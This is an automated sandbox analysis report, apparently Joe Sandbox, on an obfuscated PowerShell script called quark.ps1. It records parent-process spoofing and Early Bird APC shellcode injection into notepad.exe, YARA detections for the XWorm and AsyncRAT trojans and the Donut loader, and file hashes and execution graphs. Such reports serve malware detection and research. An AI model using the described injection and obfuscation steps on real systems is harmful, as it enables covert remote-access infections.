                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6222
                    Entropy (8bit):3.7043053775447103
                    Encrypted:false
                    SSDEEP:48:PL1b3UCwbU2K+PsukvhkvklCyw3n2vEoYkolzySogZoKPEoYkolWySogZo+1:pjUCVolkvhkvCCtBoYkoVHgoYkoGH1
                    MD5:A98532F4187D385C2FBF11A37906FD5F
                    SHA1:EE177E8EDADFB8D18FE1EB2FDDAE95B0ACF28248
                    SHA-256:32A26D22832A53FE195E1F6CE106124C2BE2900CE33B6466F19053CC71CB3213
                    SHA-512:1E5715D486B3FEAA42D36A3D6A571E3CEA3320CE80041EFD7EE7A60C92C46F3F5138BA71994E51911B53CF325861CEA48CE36DE05A9CDF5980F86032DF8E50D1
                    Malicious:false
                    Preview:...................................FL..................F.".. ...d..........2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Po.2.....(.2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XV.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XX...Roaming.@......DWSl.XX.....C.....................1.}.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XV.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.XV.....E......................?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XV.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XV.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X\.....q...........
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):753
                    Entropy (8bit):4.948874766338146
                    Encrypted:false
                    SSDEEP:12:NF+lDB5b/i7hV1cTi8QN+GISkvXQd2nWxktjXYHAWuOXQBP2axoE4Dsgkvmr6aAk:NF+lD7bK7Nwi8s+G7Ld2nXYTeBP26LCn
                    MD5:2DF1947099B4F659E022CFC0E82E70FB
                    SHA1:7A84EDFF0F461F78613DC8F84C38DE41D11D4C49
                    SHA-256:2AC099F27A15D64A8BD94FEB5D2743F32B70F11099FCA1E6020544AAF2773941
                    SHA-512:987585EC198CE1B7398377F46D9ECDEEF4BB322C3CA7FB72F6F6366BE417F68E779A697DBAE4025D0B6AC9606D455D1280EE10CE7F77665C5B043950DDBD6165
                    Malicious:false
                    Preview:[+] Launching a sacrificial process. [*] Spoofed parent process: explorer.exe (PID: 1028). [*] Spawned process: .C:\Windows\System32\notepad.exe (PID: 384)..[+] Injecting shellcode via Early Bird APC Queue. [*] Memory allocated. [-] Size: ..61440 bytes. [-] Address: ..0x0000028857430000. [-] Protection: .PAGE_READWRITE. [*] Payload decrypted and written. [-] Size: ..59648 bytes. [-] Address: ..0x0000028857430000. [*] Memory protection changed. [-] Protection: .PAGE_EXECUTE_READ. [*] APC queued. [-] Thread ID: ..6008. [*] Thread resumed. [*] Payload executed..[+] Closing opened handles. [*] Process Handle: .0x00000000000007F8. [*] Thread Handle: ..0x00000000000005AC.
                    File type:ASCII text, with very long lines (65346), with CRLF line terminators
                    Entropy (8bit):4.966291364701106
                    TrID:
                      File name:quark.ps1
                      File size:13'631'488 bytes
                      MD5:918d10fa6fd003a0bea73d2ba50538e0
                      SHA1:a089fbb17927d4a84d25e910b3d0cc7ea12faf1f
                      SHA256:4e842547867c928696600f51943bb9611adb9afc4741358fd5a97f28dcabfcf5
                      SHA512:a442521361cfdfd43f13250cb2b995a6e20713cf5559b504b2e3bc38ef12106a44f9e2eb279be200d73fa74559eeef7fa884d5dd2d85338dba846483290c1638
                      SSDEEP:24576:rWFjASpSiK44861Lh5Z5wt0WxLQ/qA31hC/v18Oa7OPgp6YxuYTj3bfQJ3gFKpLh:SyItZfFNKCIRqiEu54Hvp1jW1o96lj
                      TLSH:B0D6AE60BF945AF5EF8D1E3E906AAB1DC7F042172C32706BFA515F01B9DA146810B26F
                      File Content Preview:# Obfuscated using https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator, made by DARKN0$Y....$decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(@"..IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9Sd
                      Icon Hash:3270d6baae77db44
                      No network behavior found


                      Target ID:0
                      Start time:23:26:54
                      Start date:21/04/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1"
                      Imagebase:0x7ff7be880000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:23:26:54
                      Start date:21/04/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:23:27:27
                      Start date:21/04/2024
                      Path:C:\Windows\System32\notepad.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\notepad.exe
                      Imagebase:0x7ff69ecf0000
                      File size:201'216 bytes
                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:true


                        Execution Graph

                        Execution Coverage:14.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:27.1%
                        Total number of Nodes:48
                        Total number of Limit Nodes:7
                        execution_graph 2039 28857439cb8 LoadLibraryA 2040 28857439cda 2039->2040 2041 28857439cd0 2039->2041 2040->2041 2042 28857439d0a VirtualProtect 2040->2042 2042->2041 2043 28857439d28 2042->2043 2044 28857439d36 VirtualProtect 2043->2044 2045 28857439d56 2044->2045 2045->2041 2046 28857439d71 VirtualProtect 2045->2046 2046->2041 2047 28857439d8a 2046->2047 2048 28857439d98 VirtualProtect 2047->2048 2048->2041 2049 2885743ab03 2050 2885743ab2a 2049->2050 2051 2885743ab65 VirtualAlloc 2050->2051 2055 2885743ab82 2050->2055 2052 2885743abae 2051->2052 2051->2055 2054 2885743ac67 LoadLibraryA 2052->2054 2052->2055 2056 2885743ac82 2052->2056 2063 2885743ae5a 2052->2063 2053 2885743af02 VirtualFree 2053->2055 2054->2052 2056->2063 2064 2885743ad36 2056->2064 2080 28857439cab 2056->2080 2058 2885743ad0c 2059 2885743ad10 2058->2059 2065 28857439dc3 LoadLibraryA 2058->2065 2059->2058 2059->2063 2063->2053 2064->2063 2075 2885743a8bb 2064->2075 2066 28857439df2 2065->2066 2067 28857439de8 2065->2067 2066->2067 2068 28857439e22 VirtualProtect 2066->2068 2067->2063 2067->2064 2068->2067 2069 28857439e40 2068->2069 2070 28857439e4e VirtualProtect 2069->2070 2071 28857439e6e 2070->2071 2071->2067 2072 28857439e89 VirtualProtect 2071->2072 2072->2067 2073 28857439ea2 2072->2073 2074 28857439eb0 VirtualProtect 2073->2074 2074->2067 2076 2885743a8fb CLRCreateInstance 2075->2076 2077 2885743a910 2075->2077 2076->2077 2078 2885743a9f5 SysAllocString 2077->2078 2079 2885743a9b9 2077->2079 2078->2079 2079->2063 2081 28857439cb8 LoadLibraryA 2080->2081 2082 28857439cd0 2081->2082 2083 28857439cda 2081->2083 2082->2058 2083->2082 2084 28857439d0a VirtualProtect 2083->2084 2084->2082 2085 28857439d28 2084->2085 2086 28857439d36 VirtualProtect 2085->2086 2087 28857439d56 2086->2087 2087->2082 2088 28857439d71 VirtualProtect 2087->2088 2088->2082 2089 28857439d8a 2088->2089 2090 28857439d98 VirtualProtect 2089->2090 2090->2082

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_000002885743CDCF 1 Function_000002885743E8C9 2 Function_000002885743BECB 3 Function_000002885743CDD7 4 Function_000002885743C2D7 5 Function_000002885743C4D3 6 Function_000002885743A7DB 91 Function_000002885743C313 6->91 7 Function_0000028857439EDB 18 Function_000002885743C2F7 7->18 19 Function_000002885743BDF7 7->19 108 Function_000002885743BF3F 7->108 8 Function_000002885743A4DB 9 Function_000002885743CDDF 10 Function_000002885743C6DF 11 Function_000002885743BADF 11->4 63 Function_000002885743A867 11->63 12 Function_00000288574300DF 13 Function_000002885743C6E4 14 Function_000002885743E3E6 15 Function_00007FF84900000B 16 Function_000002885743B7E3 16->8 16->18 17 Function_000002885743E3F5 19->2 19->18 20 Function_00007FF849000836 21 Function_000002885743E3FE 22 Function_000002885743CDFB 23 Function_000002885743AB03 23->4 23->7 23->16 23->18 23->19 41 Function_0000028857439CAB 23->41 45 Function_000002885743A8BB 23->45 49 Function_0000028857439DC3 23->49 56 Function_000002885743A35B 23->56 59 Function_000002885743B35B 23->59 60 Function_000002885743C05B 23->60 86 Function_000002885743BD83 23->86 93 Function_000002885743AF23 23->93 23->108 24 Function_00007FF849000B2D 61 Function_00007FF849000190 24->61 25 Function_0000028857430006 26 Function_000002885743CE03 27 Function_000002885743C78D 33 Function_000002885743E890 27->33 95 Function_000002885743E423 27->95 28 Function_000002885743C68F 29 Function_000002885743C694 43 Function_000002885743E8B4 29->43 30 Function_000002885743A193 30->19 31 Function_000002885743E595 32 Function_000002885743E696 70 Function_000002885743E86D 32->70 109 Function_000002885743E839 32->109 34 Function_000002885743C591 35 Function_000002885743D191 36 Function_000002885743A79B 37 Function_000002885743C29F 38 Function_000002885743C5A6 38->95 39 Function_000002885743DFA1 39->38 39->43 57 Function_000002885743C45C 39->57 69 Function_000002885743CE6D 39->69 87 Function_000002885743E408 39->87 40 
Function_000002885743D1A1 41->4 42 Function_000002885743D1B4 42->1 44 Function_00007FF849000C5A 46 Function_000002885743A7BB 47 Function_0000028857439CB8 47->4 48 Function_00007FF849000270 75 Function_00007FF84900029E 48->75 49->4 50 Function_000002885743A7C7 51 Function_000002885743CDC0 52 Function_00007FF849000168 53 Function_000002885743D448 53->27 53->31 53->32 53->33 53->39 53->43 55 Function_000002885743D256 53->55 58 Function_000002885743C959 53->58 64 Function_000002885743DB60 53->64 78 Function_000002885743E470 53->78 79 Function_000002885743C873 53->79 99 Function_000002885743E42D 53->99 101 Function_000002885743CD2E 53->101 105 Function_000002885743D832 53->105 54 Function_000002885743C454 55->87 57->95 58->31 58->43 58->78 59->4 59->6 59->11 59->18 59->91 60->37 61->75 62 Function_000002885743E164 62->33 89 Function_000002885743D215 62->89 64->1 64->33 64->42 64->43 64->62 64->87 65 Function_000002885743C762 66 Function_00007FF849000589 66->52 96 Function_00007FF8490000C8 66->96 97 Function_00007FF8490001C8 66->97 67 Function_000002885743BD63 68 Function_00007FF849000188 69->87 69->95 70->109 71 Function_000002885743C76E 72 Function_000002885743BD6F 73 Function_00007FF849000CA2 74 Function_000002885743A473 76 Function_0000028857430171 77 Function_000002885743BD77 78->43 104 Function_000002885743E532 78->104 79->33 79->95 80 Function_000002885743C778 81 Function_000002885743D179 82 Function_000002885743C784 83 Function_000002885743A487 84 Function_000002885743CB82 84->78 85 Function_00007FF8490009A9 85->68 111 Function_00007FF8490001F0 85->111 86->30 88 Function_000002885743D108 90 Function_000002885743A415 92 Function_00007FF8490001D3 92->75 94 Function_00007FF8490000CD 102 Function_000002885743E428 95->102 97->75 98 Function_000002885743A72B 99->84 100 Function_000002885743CE2D 103 Function_000002885743A437 105->87 106 Function_000002885743C532 107 Function_000002885743C333 107->53 107->95 107->99 110 Function_00007FF8490001F2 110->75 111->75 112 
Function_000002885743C445 113 Function_000002885743C547 114 Function_000002885743CE47 115 Function_000002885743C542

                        Control-flow Graph

                        • Executed
                        • Graph placeholder: basic blocks starting at 2885743ab03; calls VirtualAlloc, LoadLibraryA and VirtualFree (executed/not-executed legend and edge list omitted)
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFreeLibraryLoad
                        • String ID:
                        • API String ID: 2147011437-0
                        • Opcode ID: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                        • Instruction ID: f26ea494a9ecb9a4f331e868476c1793c1b2ae8c2d865fe5527c5be6ec673721
                        • Opcode Fuzzy Hash: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                        • Instruction Fuzzy Hash: 39D18734395A084BE779FA68C4997AA73D1FB48311FD5C52DE48FC3186DE38D8868B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Graph placeholder: basic blocks starting at 2885743af23; no API calls in this graph (executed/not-executed legend and edge list omitted)
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                        • Instruction ID: 22b818801e3268296137bc4291d20f468e5c9d58192d557aba9433552903459b
                        • Opcode Fuzzy Hash: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                        • Instruction Fuzzy Hash: 5AE16E31508B488BDB59EF68C889BAAB7E1FF94300F54862DE84ECB155DF34E585CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                        • Instruction ID: cbe9207843c33fef3047712fc28ac502282e2f9c2026992179e01d5537f4aac9
                        • Opcode Fuzzy Hash: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                        • Instruction Fuzzy Hash: 2A31C33170CA094FEB58BA9CE88E26A73D5EB94311F558129EC4FC32C5DD68DD4287C1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                        • Instruction ID: d790206753ee0f2c289af15a8a69d1462b9a8e854e1290659403c3bf6dce7e2f
                        • Opcode Fuzzy Hash: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                        • Instruction Fuzzy Hash: 88319035308A084BDBA8BA9CD85D25973D2EBD8320F458259DC1FC72C9EE68DD4187C5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Graph placeholder: basic blocks starting at 2885743a8bb; calls CLRCreateInstance and SysAllocString (executed/not-executed legend and edge list omitted)
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocCreateInstanceString
                        • String ID:
                        • API String ID: 218245030-0
                        • Opcode ID: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                        • Instruction ID: 71663abfd6255e724b6b1a9d48f9af92fdafe2b9777655917543c72f55b903e3
                        • Opcode Fuzzy Hash: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                        • Instruction Fuzzy Hash: 9C814231348A088FDB68EF28C888BA6B7E5FFA5301F418A6DD49FC7151DE35E5458B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                        • Instruction ID: b706089878e96558b3eedcdcd6f64e243bce120998d41d7bdb03f2d81a9f7c4a
                        • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                        • Instruction Fuzzy Hash: 5BE0203120CA0D0FF768A6DDD84E7B666D8D796275F40003EF54EC2141E545D8D203D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95e32d529cf587da912ec400ac959313b1b954a276579f163edf0f96ea77d0bb
                        • Instruction ID: 5556827f4e5b093236fa49750b8e96cd0eda5171c657f4cdba83cde6d2b9ad03
                        • Opcode Fuzzy Hash: 95e32d529cf587da912ec400ac959313b1b954a276579f163edf0f96ea77d0bb
                        • Instruction Fuzzy Hash: 3E811721E0EACA4FEBAAAB3854256797FB1EF56384B4401FAC04DCB2D3DD1C5A45C352
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Graph placeholder: basic blocks starting at 7ff849000ca2; no API calls in this graph (executed/not-executed legend and edge list omitted)
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb45377d7dd7d9e993410ea7dcb32da202a022dab6f699dd2d747835b406cb21
                        • Instruction ID: 5a7c00ed6439b4d03b44212b1a1676b8dfab25dfa9aa6dbd500c4900449d327c
                        • Opcode Fuzzy Hash: bb45377d7dd7d9e993410ea7dcb32da202a022dab6f699dd2d747835b406cb21
                        • Instruction Fuzzy Hash: E3613B20A0EAC64FE756AB3C54152757FE1EF87250B4900FBD48DCB2A3DC189C46C362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d7095627defc9e06d2923e050186c7418dc141e0a17cbad0b65e1e4878838ed
                        • Instruction ID: 20370db0143e00aa8d602b92c8299b48d86d83bb3c3e5430ee2dc2f898a478b5
                        • Opcode Fuzzy Hash: 7d7095627defc9e06d2923e050186c7418dc141e0a17cbad0b65e1e4878838ed
                        • Instruction Fuzzy Hash: 5B413821B1DA890FE799AB3C545A2797BD2EF9A255F0901FFE04DC72A3CD188C06C341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f83281a7eb06b8d41ac431576e88f92ebd03bde2b7dfb8a25a350313743d5a2
                        • Instruction ID: c935c9bcdd83ab00c790d785606ee9fdace48cb237c8d764aba08b2769646485
                        • Opcode Fuzzy Hash: 2f83281a7eb06b8d41ac431576e88f92ebd03bde2b7dfb8a25a350313743d5a2
                        • Instruction Fuzzy Hash: DE51A12091EB8A9FEB46EB7894106A9BFB1EF4B340F9401F6D048DB293DD2C5A44C721
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Graph placeholder: single basic block 7ff8490000c8-7ff8490009a4; no API calls in this graph (executed/not-executed legend omitted)
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fec51f9788626b34dd559d2dbbcd81746f8d7b052a02e8dc2fce5d62343a92c3
                        • Instruction ID: f25d02ddfd45abfff318036fc4dac1b10fe97e77d3b67538148908351389c414
                        • Opcode Fuzzy Hash: fec51f9788626b34dd559d2dbbcd81746f8d7b052a02e8dc2fce5d62343a92c3
                        • Instruction Fuzzy Hash: B931D321B1D9491FE798FE2C545A27DB7D2EF9D355F0501BAE04EC72A3DE289C418341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Graph placeholder: basic blocks starting at 7ff849000b2d with an internal call to 7ff849000190; no API calls in this graph (executed/not-executed legend and edge list omitted)
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 735c99694de1c86f981a55272605f70dea9c6e950b137b7665be9a499644d8f8
                        • Instruction ID: e49d338a0c7146d1efe94c9c98e4e1a67d03da5b48ba56cc820185ed4e245347
                        • Opcode Fuzzy Hash: 735c99694de1c86f981a55272605f70dea9c6e950b137b7665be9a499644d8f8
                        • Instruction Fuzzy Hash: 9231C620F1994A8FEB84BB78585A3BDB7E2FF98745F1401BAE40DC3193EE2C98418751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                        • Instruction ID: b67f3418ab9e85ffab3f5274c0d614fb92838479c910f71f2bdefcf065e21420
                        • Opcode Fuzzy Hash: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                        • Instruction Fuzzy Hash: 78F1B134255A098BEB78EF68C8497A6B3D1FB54311F95C62DD88AC3281DF38E842C7C1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                        • Instruction ID: 04a2e5a59350fb1f51084feee2fd5e312d1f86a68799e0d939dc001244735dc1
                        • Opcode Fuzzy Hash: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                        • Instruction Fuzzy Hash: F4A10D31608A4C8FDB65EF68C889BDA77E5FBA8315F10462AE44AC7160EF30D645CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                        • Instruction ID: 3fd86b539d745005f89470ba92e16b77a1b57902c953c7f23a6e66032217c26d
                        • Opcode Fuzzy Hash: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                        • Instruction Fuzzy Hash: E1818434658B494BDB68EF64C8897EAB7E4FB58301F41862DE89FC2141EF34E5458BC1
                        Uniqueness

                        Uniqueness Score: -1.00%